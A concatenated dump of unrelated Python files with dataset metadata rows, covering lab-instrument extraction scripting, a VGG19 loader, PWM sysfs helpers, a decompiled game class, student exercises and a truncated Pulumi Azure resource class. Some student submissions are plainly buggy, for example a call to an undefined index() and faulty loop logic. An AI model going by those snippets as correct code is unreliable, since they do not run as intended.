if self.is_canceled():
self.console_info('waitfor canceled')
return
ct = time.time() - st
if timeout and ct > timeout:
self.warning('waitfor timed out after {}s'.format(timeout))
self.cancel()
return
if include_time:
args = (ct,)
elif include_time_and_count:
args = (ct, i)
i += 1
else:
args = tuple()
if func(*args):
self.console_info('waitfor ended. {}'.format(end_message))
break
time.sleep(check_period)
@verbose_skip
@command_register
def power_map(self, cx, cy, padding, bd, power):
pass
@verbose_skip
@command_register
def degas(self, lumens=0, duration=0):
self._extraction_action([('do_machine_vision_degas', (lumens, duration), {})])
@verbose_skip
@command_register
def autofocus(self, set_zoom=True):
self._extraction_action([('do_autofocus', (), {'set_zoom': set_zoom})])
@verbose_skip
@command_register
def set_light(self, value=''):
self._extraction_action([('set_light', (value,), {})])
@verbose_skip
@command_register
def snapshot(self, name='', prefix='', view_snapshot=False, pic_format='.jpg'):
"""
if name not specified use RID_Position e.g 12345-01A_3
"""
if not name:
pos = '_'.join(self.position)
name = '{}_{}'.format(self.run_identifier, pos)
name = '{}{}'.format(prefix, name)
ps = self._extraction_action([('take_snapshot', (name, pic_format),
{'view_snapshot':view_snapshot})])
if ps:
self.snapshots.append(ps)
@command_register
def video_recording(self, name='video'):
return RecordingCTX(self, name)
@verbose_skip
@command_register
def start_video_recording(self, name='video'):
self._extraction_action([('start_video_recording', (), {'name': name})])
@verbose_skip
@command_register
def stop_video_recording(self):
self._extraction_action([('stop_video_recording', (), {})])
@verbose_skip
@command_register
def set_x(self, value, velocity=''):
self._set_axis('x', value, velocity)
@verbose_skip
@command_register
def set_y(self, value, velocity=''):
self._set_axis('y', value, velocity)
@verbose_skip
@command_register
def set_z(self, value, velocity=''):
self._set_axis('z', value, velocity)
@verbose_skip
@command_register
def set_xy(self, value, velocity=''):
self._set_axis('xy', value, velocity)
@verbose_skip
@command_register
def set_motor_lock(self, name='', value=''):
if name and value is not '':
l = 'YES' if value else 'NO'
self.console_info('set motor lock to {}'.format(name, l))
self._extraction_action([('set_motor_lock', (name, value), {})])
@verbose_skip
@command_register
def set_motor(self, name='', value=''):
self.console_info('setting motor "{}" to {}'.format(name, value))
if name is not '' and value is not '':
if value is not None:
self._extraction_action([('set_motor', (name, value), {})])
@verbose_skip
@command_register
def get_value(self, name):
try:
print name, self.get_context()[name]
return self.get_context()[name]
except KeyError:
self.warning('no name {} in context'.format(name))
pass
@verbose_skip
@command_register
def move_to_position(self, position='', autocenter=False):
if position == '':
position = self.position
if position:
position_ok = True
if isinstance(position, (list, tuple)):
position_ok = all(position)
else:
position_ok = False
if position_ok:
self.console_info('{} move to position {}'.format(self.extract_device,
position))
success = self._extraction_action([('move_to_position',
(position, autocenter), {})])
if not success:
self.info('{} move to position failed'.format(self.extract_device))
self.cancel()
else:
self.console_info('move to position suceeded')
return True
else:
self.console_info('move not required. position is None')
return True
@verbose_skip
@command_register
def execute_pattern(self, pattern='', block=True):
if pattern == '':
pattern = self.pattern
st = time.time()
# set block=True to wait for pattern completion
self._extraction_action([('execute_pattern', (pattern,), {'block': block})])
return time.time() - st
@verbose_skip
@command_register
def set_tray(self, tray=''):
if tray == '':
tray = self.tray
self.console_info('set tray to {}'.format(tray))
result = self._extraction_action([('set_stage_map', (tray,), {})])
return result
@verbose_skip
@command_register
def load_pipette(self, identifier, timeout=300):
"""
this is a non blocking command. it simply sends a command to apis to
start one of its runscripts.
it is the ExtractionPyScripts responsiblity to handle the waiting.
use the waitfor command to wait for signals from apis.
"""
from pychron.external_pipette.apis_manager import InvalidPipetteError
cmd = 'load_blank_non_blocking' if self.analysis_type == 'blank' else 'load_pipette_non_blocking'
try:
#bug _manager_action only with except tuple of len 1 for args
rets = self._extraction_action([(cmd, (identifier,),
# {'timeout': timeout, 'script': self})],
{'timeout': timeout, })],
name='externalpipette',
protocol=IPipetteManager)
return rets[0]
except InvalidPipetteError, e:
self.cancel(protocol=IPipetteManager)
e = str(e)
self.warning(e)
return e
@verbose_skip
@command_register
def extract_pipette(self, identifier='', timeout=300):
"""
this is an atomic command. use the apis_controller config file to define
the isolation procedures.
"""
from pychron.external_pipette.apis_manager import InvalidPipetteError
if identifier == '':
identifier = self.extract_value
cmd = 'load_blank' if self.analysis_type == 'blank' else 'load_pipette'
try:
#bug _manager_action only with except tuple of len 1 for args
rets = self._extraction_action([(cmd, (identifier,),
{'timeout': timeout, 'script': self})],
name='externalpipette',
protocol=IPipetteManager)
return rets[0]
except (TimeoutError, InvalidPipetteError), e:
self.cancel(protocol=IPipetteManager)
e = str(e)
self.warning(e)
return e
@verbose_skip
@command_register
def extract(self, power='', units=''):
if power == '':
power = self.extract_value
if units == '':
units = self.extract_units
ed = self.extract_device
ed = ed.replace('_', ' ')
# get current position and add as an extraction position
pos = self._extraction_action([('get_position', (), {})])
self._extraction_positions.append(pos)
# set an experiment message
if self.manager:
self.manager.set_extract_state('{} ON! {}({})'.format(ed, power, units), color='red')
self.console_info('extract sample to {} ({})'.format(power, units))
self._extraction_action([('extract', (power,), {'units': units})])
@verbose_skip
@command_register
def end_extract(self):
self._extraction_action([('end_extract', (), {})])
@verbose_skip
@command_register
def fire_laser(self):
self._extraction_action([('fire_laser', (), {})])
@verbose_skip
@command_register
def ramp(self, start=0, setpoint=0, duration=0, rate=0, period=1):
self.debug('ramp parameters start={}, '
'setpoint={}, duration={}, rate={}, period={}'.format(start, setpoint, duration, rate, period))
def func(i, ramp_step):
if self._cancel:
return
self.console_info('ramp step {}. setpoint={}'.format(i, ramp_step))
if not self._extraction_action([('set_laser_power', (ramp_step,), {})]):
return
if self._cancel:
return
return True
st = time.time()
rmp = Ramper()
rmp.ramp(func, start, setpoint, duration, rate, period)
return time.time() - st
@verbose_skip
@command_register
def acquire(self, name=None, clear=False):
if self.runner is None:
self.debug('+++++++++++++++++++++++ Runner is None')
return
self.console_info('acquire {}'.format(name))
self.runner.connect()
r = self.runner.get_resource(name)
if not clear:
if r.isSet():
self.console_info('waiting for access')
if self.manager:
self.manager.set_extract_state('Waiting for Resource Access. "{}"'.format(name), color='red')
while r.isSet():
if self._cancel:
break
self._sleep(1)
if not self.runner.reset_connection():
self.cancel()
break
if not self._cancel:
self._resource_flag = r
r.set()
self.console_info('{} acquired'.format(name))
if self.manager:
self.manager.set_extract_state(False)
@verbose_skip
@command_register
def wait(self, name=None, criterion=0):
if self.runner is None:
self.debug('+++++++++++++++++++++++ Runner is None')
return
self.console_info('waiting for {} = {}'.format(name, criterion))
r = self.runner.get_resource(name)
cnt = 0
resp = r.read()
if resp is not None:
while resp != criterion:
time.sleep(1)
# only verbose every 10s
resp = r.read(verbose=cnt % 10 == 0)
if resp is None:
continue
cnt += 1
if cnt > 100:
cnt = 0
self.console_info('finished waiting')
@verbose_skip
@command_register
def release(self, name=None):
self.console_info('release {}'.format(name))
if self.runner is None:
self.debug('+++++++++++++++++++++++ Runner is None')
return
r = self.runner.get_resource(name)
if r is not None:
r.clear()
else:
self.console_info('Could not release {}'.format(name))
@verbose_skip
@command_register
def set_resource(self, name=None, value=1):
if self.runner is None:
self.debug('+++++++++++++++++++++++ Runner is None')
return
r = self.runner.get_resource(name)
if r is not None:
r.set(value)
else:
self.console_info('Could not set {}'.format(name))
@verbose_skip
@command_register
def get_resource_value(self, name=None):
if self.runner is None:
self.debug('+++++++++++++++++++++++ Runner is None')
return
r = self.runner.get_resource(name)
resp = None
if r is not None:
if hasattr(r, 'get'):
resp = r.get()
else:
resp = r.isSet()
else:
self.console_info('Could not get {}'.format(name))
self.debug('Get Resource Value {}={}'.format(name, resp))
return resp
@verbose_skip
@command_register
def enable(self):
ed = self.extract_device
ed = ed.replace('_', ' ')
self.manager.set_extract_state('{} Enabled'.format(ed))
return self._manager_action([('enable_device', (), {})],
protocol=ILaserManager,
name=self.extract_device)
@verbose_skip
@command_register
def disable(self):
return self._disable()
@verbose_skip
@command_register
def prepare(self):
return self._extraction_action([('prepare', (), {})])
# ===============================================================================
# properties
# ===============================================================================
def _get_property(self, key, default=None):
ctx = self.get_context()
return ctx.get(key, default)
@property
def duration(self):
return self._get_property('duration')
# return self.get_context()['duration']
@property
def cleanup(self):
return self._get_property('cleanup')
# return self.get_context()['cleanup']
@property
def pattern(self):
return self._get_property('pattern')
# return self.get_context()['pattern']
@property
def analysis_type(self):
at = self._get_property('analysis_type')
self.debug('getting analysis type for {}. '
'analysis_type={}'.format(self.run_identifier, at))
return at
# return self.get_context()['analysis_type']
@property
def extract_device(self):
return self._get_property('extract_device')
# return self.get_context()['extract_device']
@property
def tray(self):
return self._get_property('tray')
# return self.get_context()['tray']
@property
def position(self):
"""
if position is 0 return None
"""
# pos = self.get_context()['position']
pos = self._get_property('position')
if pos:
return pos
@property
def extract_value(self):
return self._get_property('extract_value')
# return self.get_context()['extract_value']
@property
def extract_units(self):
return self._get_property('extract_units')
# return self.get_context()['extract_units']
@property
def beam_diameter(self):
return self._get_property('beam_diameter')
# return self.get_context()['beam_diameter']
@property
def run_identifier(self):
return self._get_property('run_identifier')
# ===============================================================================
# private
# ===============================================================================
def _abort_hook(self):
self.disable()
def _cancel_hook(self):
self.disable()
def _get_device(self, name):
app = self._get_application()
if app is not None:
return app.get_service_by_name(ICoreDevice, name)
else:
self.warning('_get_device - No application')
def _make_waitfor_func(self, name, funcname, comp):
dev = self._get_device(name)
if dev:
devfunc = getattr(dev, funcname)
m = COMPRE.findall(comp)
if m:
k = m[0]
def func(*args):
return eval(comp, {k: devfunc()})
return func
else:
self.warning('invalid comparison. valid e.g.=x<10 comp={}'.format(comp))
else:
self.warning('no device available named "{}"'.format(name))
def _extraction_action(self, *args, **kw):
if not 'name' in kw:
kw['name'] = self.extract_device
kw['name'] = kw.get('name', self.extract_device) or self.extract_device
if kw['name'] in ('Extract Device', LINE_STR):
return
# if not 'protocol' in kw:
# kw['protocol'] = ILaserManager
kw['protocol']=kw.get('protocol', ILaserManager) or ILaserManager
return self._manager_action(*args, **kw)
def _disable(self, protocol=None):
self.debug('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% disable')
if self.manager:
self.manager.set_extract_state(False)
return self._extraction_action([('disable_device', (), {})], protocol=protocol)
def _set_axis(self, name, value, velocity):
kw = dict(block=True)
if velocity:
kw['velocity'] = value
success = self._extraction_action([('set_{}'.format(name), (value,), kw)])
if not success:
self.console_info('{} move to position failed'.format(self.extract_device))
else:
self.console_info('move to position suceeded')
return True
def _cancel_hook(self, **kw):
if self._resource_flag:
self._resource_flag.clear()
# disable the extract device
self._disable(**kw)
# stop patterning
self._stop_pattern(**kw)
def _stop_pattern(self, protocol=None):
self._extraction_action([('stop_pattern', (), {})], protocol=protocol)
# ============= EOF ==================================== | [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
5f51abe52378a636ea41db4efa51780a173e9ad5 | 6b265b404d74b09e1b1e3710e8ea872cd50f4263 | /Python/CodeTesting/Asserts/fac.py | 7572aa64bddf2acdd30e38c0485814ca7db55178 | [
"CC-BY-4.0"
] | permissive | gjbex/training-material | cdc189469ae2c7d43784ecdcb4bcca10ecbc21ae | e748466a2af9f3388a8b0ed091aa061dbfc752d6 | refs/heads/master | 2023-08-17T11:02:27.322865 | 2023-04-27T14:42:55 | 2023-04-27T14:42:55 | 18,587,808 | 130 | 60 | CC-BY-4.0 | 2023-08-03T07:07:25 | 2014-04-09T06:35:58 | Jupyter Notebook | UTF-8 | Python | false | false | 539 | py | #!/usr/bin/env python
def fac(n):
'''compute the factorial of given number'''
assert type(n) == int, 'argument must be integer'
assert n >= 0, 'argument must be positive'
if n > 1:
return n*fac(n - 1)
else:
return 1
if __name__ == '__main__':
for i in range(5):
print('{0}! = {1}'.format(i, fac(i)))
for i in [-2, 0.3, 3.0]:
try:
print('{0}! = {1}'.format(i, fac(i)))
except AssertionError as error:
print('{0}! failed: "{1}"'.format(i, error))
| [
"geertjan.bex@uhasselt.be"
] | geertjan.bex@uhasselt.be |
90e80b34f6a4d3649a476769aa02209fa9c279ee | 2af6a5c2d33e2046a1d25ae9dd66d349d3833940 | /res/scripts/client/gui/shared/gui_items/dossier/achievements/strategicoperationsachievement.py | e881003ec46abf209367c8d18f410da809eed7fb | [] | no_license | webiumsk/WOT-0.9.12-CT | e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2 | 2506e34bd6634ad500b6501f4ed4f04af3f43fa0 | refs/heads/master | 2021-01-10T01:38:38.080814 | 2015-11-11T00:08:04 | 2015-11-11T00:08:04 | 45,803,240 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,075 | py | # 2015.11.10 21:29:19 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/shared/gui_items/dossier/achievements/StrategicOperationsAchievement.py
from abstract import ClassProgressAchievement
from dossiers2.ui.achievements import ACHIEVEMENT_BLOCK as _AB
class StrategicOperationsAchievement(ClassProgressAchievement):
def __init__(self, dossier, value = None):
super(StrategicOperationsAchievement, self).__init__('strategicOperations', _AB.RATED_7X7, dossier, value)
def getNextLevelInfo(self):
return ('winsLeft', self._lvlUpValue)
def _readProgressValue(self, dossier):
return dossier.getRecordValue(_AB.RATED_7X7, 'strategicOperations')
def _readCurrentProgressValue(self, dossier):
return dossier.getTotalStats().getWinsCount()
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\shared\gui_items\dossier\achievements\strategicoperationsachievement.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:29:19 Střední Evropa (běžný čas)
| [
"info@webium.sk"
] | info@webium.sk |
bfb73d4604aeb01237151f4498cf682dc33c7707 | 4ba3a17f53985700de7b9e2c6ef9b9b5f1ad2e8d | /vgg.py | 3557e2cbdec843382f81dba825f678e3eaf7ef5f | [] | no_license | brjathu/style_kernel | fcba958221ba203ad87c8c855726f8d43f7fdd1e | f9c285f38b54132c957bb1543f434a7d2ae3e178 | refs/heads/master | 2021-07-25T19:37:25.174814 | 2017-11-08T02:07:44 | 2017-11-08T02:07:44 | 103,022,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | py | import tensorflow as tf
import numpy as np
import scipy.io
VGG19_LAYERS = (
'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',
'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',
'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',
'relu3_3', 'conv3_4', 'relu3_4', 'pool3',
'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',
'relu4_3', 'conv4_4', 'relu4_4', 'pool4',
'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',
'relu5_3', 'conv5_4', 'relu5_4'
)
def load_net(data_path):
data = scipy.io.loadmat(data_path)
mean = data['normalization'][0][0][0]
mean_pixel = np.mean(mean, axis=(0, 1))
weights = data['layers'][0]
return weights, mean_pixel
def net_preloaded(weights, input_image, pooling):
net = {}
current = input_image
for i, name in enumerate(VGG19_LAYERS):
kind = name[:4]
if kind == 'conv':
kernels, bias = weights[i][0][0][0][0]
# matconvnet: weights are [width, height, in_channels, out_channels]
# tensorflow: weights are [height, width, in_channels, out_channels]
kernels = np.transpose(kernels, (1, 0, 2, 3))
bias = bias.reshape(-1)
current = _conv_layer(current, kernels, bias)
elif kind == 'relu':
current = tf.nn.relu(current)
elif kind == 'pool':
current = _pool_layer(current, pooling)
net[name] = current
assert len(net) == len(VGG19_LAYERS)
return net
def _conv_layer(input, weights, bias):
conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1),
padding='SAME')
return tf.nn.bias_add(conv, bias)
def _pool_layer(input, pooling):
if pooling == 'avg':
return tf.nn.avg_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
padding='SAME')
else:
return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
padding='SAME')
def preprocess(image, mean_pixel):
return image - mean_pixel
def unprocess(image, mean_pixel):
return image + mean_pixel
| [
"brjathu@gmail.com"
] | brjathu@gmail.com |
973a45474eb480e5f8a6f94ec757e3a5fe555165 | ac625440f8809a1cf0c7e9d8059f82725afcd9b8 | /backend/code_submission/starter_code/find-triplets-starter.py | 998dcda72dcf497c8de2a6ee97615dcb1d8d3342 | [] | no_license | cfireborn/PrepCS | d4c746fb99d27285236e162dce7d9776d90dce56 | 8447572de85301476f548e5dc279eeb807a2496c | refs/heads/master | 2022-12-10T01:23:53.907509 | 2019-06-10T22:13:23 | 2019-06-10T22:13:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | def naive_find_triplets(lst):
solution = []
return solution
| [
"david.awogbemila@bison.howard.edu"
] | david.awogbemila@bison.howard.edu |
08d9b6d4b9d5aeff1c5b501d48c1cfbe84d1d66f | 52542d7f93a97db5433293781e0b514f5330a127 | /USV_V1/sensor/src/test_ws/sensor_dep/pwm_func.py | 7970ffc38fabc807d658c570608d343aed3e3cb9 | [
"Apache-2.0"
] | permissive | supcon-nzic/USV | 437002ade39a8d4c70930c56127943a707152b83 | 52c97759f97f3222ca5465a5745842cfeb7f26a1 | refs/heads/master | 2022-11-20T11:38:11.783570 | 2020-07-28T01:09:37 | 2020-07-28T01:09:37 | 279,798,518 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | # -*- coding: utf-8 -*-
import string
def pwm_export(pwm_num):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/export'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_export = open(pwm_dir,'w')
file_export.write('0')
file_export.close
def pwm_unexport(pwm_num):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/unexport'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_unexport = open(pwm_dir,'w')
file_unexport.write('0')
file_unexport.close
def pwm_period_config(pwm_num, period):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/pwm0/period'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_period = open(pwm_dir,'w')
pwm_period = str(period)
file_period.write(pwm_period)
file_period.close()
def pwm_duty_cycle_config(pwm_num, duty_cycle):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/pwm0/duty_cycle'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_duty = open(pwm_dir,'w')
pwm_duty_cycle = str(duty_cycle)
file_duty.write(pwm_duty_cycle)
file_duty.close()
def pwm_enable(pwm_num):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/pwm0/enable'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_enable = open(pwm_dir,'w')
pwm_enable = str("1")
file_enable.write(pwm_enable)
file_enable.close()
def pwm_capture(pwm_num):
pwm_num = str(pwm_num)
pwm = '/sys/class/pwm/pwmchip/pwm0/capture'
pwm_dir = pwm[:22] + pwm_num + pwm[22:]
file_capture = open(pwm_dir)
pwm_capture = file_capture.read()
period = pwm_capture.split(' ')[0]
duty_cycle = pwm_capture.split(' ')[1]
pwm_capture_period = int(period)
pwm_capture_duty_cycle = int(duty_cycle)
file_capture.close()
return pwm_capture_period, pwm_capture_duty_cycle
# return pwm_capture_duty_cycle
| [
"qiuyunpeng@nz-ic.com"
] | qiuyunpeng@nz-ic.com |
d6915f891d241df17076fd4aac05f43ece785f6d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/10/usersdata/73/23003/submittedfiles/testes.py | 946f242d6568fd56d5fe56ac4d96a251e4c428f5 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | # -*- coding: utf-8 -*-
from __future__ import division
qs=input('quantidade de salas:')
for i in range (0,qs,1):
sala=[]
sala.append(input('quantidade de vidas da sala:'))
print sala
pe=input('porta de entrada:')
ps=input('porta de saída:')
soma=0
for i in range(sala[pe],sala[ps]+1,1):
a=sala[pe+i]
soma=soma+a
if sala[pe]==sala[ps]:
break
print s | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
522e260b84afd3a41e0c49124e442dacd6830b89 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_055/ch147_2020_04_12_04_04_45_284109.py | 49542792d1c1e1124502b5db7a53e21506d70c53 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | def mais_frequente(lista_palavras):
contagem = {}
for palavra in lista_palavras:
if palavra not in contagem:
contagem[palavra] = 1
else:
contagem[palavra] += 1
max_value = index(max(contagem.values()))
return max_value | [
"you@example.com"
] | you@example.com |
02e60d332c813451d3d9c5255a8f743db92ca55a | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/insights/latest/metric_alert.py | 50b45a69d4e1e078c908b4c4f226f57d69e1c428 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 12,275 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['MetricAlert']
class MetricAlert(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
actions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MetricAlertActionArgs']]]]] = None,
auto_mitigate: Optional[pulumi.Input[bool]] = None,
criteria: Optional[pulumi.Input[Union[pulumi.InputType['MetricAlertMultipleResourceMultipleMetricCriteriaArgs'], pulumi.InputType['MetricAlertSingleResourceMultipleMetricCriteriaArgs'], pulumi.InputType['WebtestLocationAvailabilityCriteriaArgs']]]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
evaluation_frequency: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_resource_region: Optional[pulumi.Input[str]] = None,
target_resource_type: Optional[pulumi.Input[str]] = None,
window_size: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
The metric alert resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MetricAlertActionArgs']]]] actions: the array of actions that are performed when the alert rule becomes active, and when an alert condition is resolved.
:param pulumi.Input[bool] auto_mitigate: the flag that indicates whether the alert should be auto resolved or not. The default is true.
:param pulumi.Input[Union[pulumi.InputType['MetricAlertMultipleResourceMultipleMetricCriteriaArgs'], pulumi.InputType['MetricAlertSingleResourceMultipleMetricCriteriaArgs'], pulumi.InputType['WebtestLocationAvailabilityCriteriaArgs']]] criteria: defines the specific alert criteria information.
:param pulumi.Input[str] description: the description of the metric alert that will be included in the alert email.
:param pulumi.Input[bool] enabled: the flag that indicates whether the metric alert is enabled.
:param pulumi.Input[str] evaluation_frequency: how often the metric alert is evaluated represented in ISO 8601 duration format.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] rule_name: The name of the rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scopes: the list of resource id's that this metric alert is scoped to.
:param pulumi.Input[int] severity: Alert severity {0, 1, 2, 3, 4}
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
:param pulumi.Input[str] target_resource_region: the region of the target resource(s) on which the alert is created/updated. Mandatory for MultipleResourceMultipleMetricCriteria.
:param pulumi.Input[str] target_resource_type: the resource type of the target resource(s) on which the alert is created/updated. Mandatory for MultipleResourceMultipleMetricCriteria.
:param pulumi.Input[str] window_size: the period of time (in ISO 8601 duration format) that is used to monitor alert activity based on the threshold.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['actions'] = actions
__props__['auto_mitigate'] = auto_mitigate
if criteria is None:
raise TypeError("Missing required property 'criteria'")
__props__['criteria'] = criteria
if description is None:
raise TypeError("Missing required property 'description'")
__props__['description'] = description
if enabled is None:
raise TypeError("Missing required property 'enabled'")
__props__['enabled'] = enabled
if evaluation_frequency is None:
raise TypeError("Missing required property 'evaluation_frequency'")
__props__['evaluation_frequency'] = evaluation_frequency
if location is None:
raise TypeError("Missing required property 'location'")
__props__['location'] = location
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if rule_name is None:
raise TypeError("Missing required property 'rule_name'")
__props__['rule_name'] = rule_name
__props__['scopes'] = scopes
if severity is None:
raise TypeError("Missing required property 'severity'")
__props__['severity'] = severity
__props__['tags'] = tags
__props__['target_resource_region'] = target_resource_region
__props__['target_resource_type'] = target_resource_type
if window_size is None:
raise TypeError("Missing required property 'window_size'")
__props__['window_size'] = window_size
__props__['last_updated_time'] = None
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:insights/v20180301:MetricAlert")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(MetricAlert, __self__).__init__(
'azure-nextgen:insights/latest:MetricAlert',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'MetricAlert':
"""
Get an existing MetricAlert resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return MetricAlert(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def actions(self) -> pulumi.Output[Optional[Sequence['outputs.MetricAlertActionResponse']]]:
"""
the array of actions that are performed when the alert rule becomes active, and when an alert condition is resolved.
"""
return pulumi.get(self, "actions")
@property
@pulumi.getter(name="autoMitigate")
def auto_mitigate(self) -> pulumi.Output[Optional[bool]]:
"""
the flag that indicates whether the alert should be auto resolved or not. The default is true.
"""
return pulumi.get(self, "auto_mitigate")
@property
@pulumi.getter
def criteria(self) -> pulumi.Output[Any]:
"""
defines the specific alert criteria information.
"""
return pulumi.get(self, "criteria")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
the description of the metric alert that will be included in the alert email.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[bool]:
"""
the flag that indicates whether the metric alert is enabled.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="evaluationFrequency")
def evaluation_frequency(self) -> pulumi.Output[str]:
"""
how often the metric alert is evaluated represented in ISO 8601 duration format.
"""
return pulumi.get(self, "evaluation_frequency")
@property
@pulumi.getter(name="lastUpdatedTime")
def last_updated_time(self) -> pulumi.Output[str]:
"""
Last time the rule was updated in ISO8601 format.
"""
return pulumi.get(self, "last_updated_time")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
the list of resource id's that this metric alert is scoped to.
"""
return pulumi.get(self, "scopes")
@property
@pulumi.getter
def severity(self) -> pulumi.Output[int]:
"""
Alert severity {0, 1, 2, 3, 4}
"""
return pulumi.get(self, "severity")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="targetResourceRegion")
def target_resource_region(self) -> pulumi.Output[Optional[str]]:
"""
the region of the target resource(s) on which the alert is created/updated. Mandatory for MultipleResourceMultipleMetricCriteria.
"""
return pulumi.get(self, "target_resource_region")
@property
@pulumi.getter(name="targetResourceType")
def target_resource_type(self) -> pulumi.Output[Optional[str]]:
"""
